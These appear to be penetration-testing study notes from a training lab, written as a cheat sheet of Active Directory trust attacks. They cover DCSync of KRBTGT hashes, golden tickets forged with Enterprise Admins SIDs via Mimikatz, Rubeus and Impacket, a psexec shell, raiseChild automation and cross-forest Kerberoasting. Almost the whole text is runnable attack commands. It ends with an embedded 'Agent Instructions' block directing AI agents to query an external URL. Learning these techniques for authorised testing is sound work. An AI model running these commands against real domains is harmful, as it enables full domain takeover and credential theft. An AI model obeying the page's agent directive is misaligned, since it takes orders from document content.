# Domain Trust Enumeration

## Enumerate Domain Trusts (PowerView)

### Show Existing Trusts

```powershell
Get-Domaintrust
```

### Show Trust Mapping

```powershell
Get-DomainTrustMapping
```

### Show Users in the Child Domain

```powershell
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```

## Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain.
5. The SID of the Enterprise Admins group of the root domain.
6. With this data collected, the attack can be performed with Mimikatz.

### 1 Obtaining KRBTGT NT Hash

```powershell
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
```

### 2 Obtaining SID Child Domain

```powershell
Get-DomainSID
```

### 3 Name Target User

```powershell
# Can be a fake usernamr
```

### 4 FQDN Child Domain

```powershell
Get-Domaintrust
```

### 5 SID Enterprise Admins Group

```powershell
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

### 6 Putting It All Together

```powershell
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```

### 7 Confirm Ticket

```powershell
# List Tickets
klist
```

### 8 DCsync

```powershell
# Mimikatz
lsadump::dcsync
```

## Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain

#### 1 Get KRBTGT NT Hash

```bash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```

#### 2 Get SID Child Domain

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"
```

#### 3 Name Target User

```powershell
Can be any name
```

#### 4 Get SID Enterprise Admins

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```

#### 5 Putting it all Together

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
```

#### 6 Export ccache

```bash
export KRB5CCNAME=hacker.ccache 
```

#### 7 Get Shell

```bash
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
```

### Automatic Way

```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```

## Attacking Domain Trust - Cross-Forest (Windows)

### Cross-Forest Kerberoasting

```powershell
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
```

### Admin Password Reuse & Group Membership

```powershell
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
```

### SID History Abuse

!\[\[Pasted image 20230428181936.png]]

## Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

### Cross-Forest Kerberosting

```bash
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.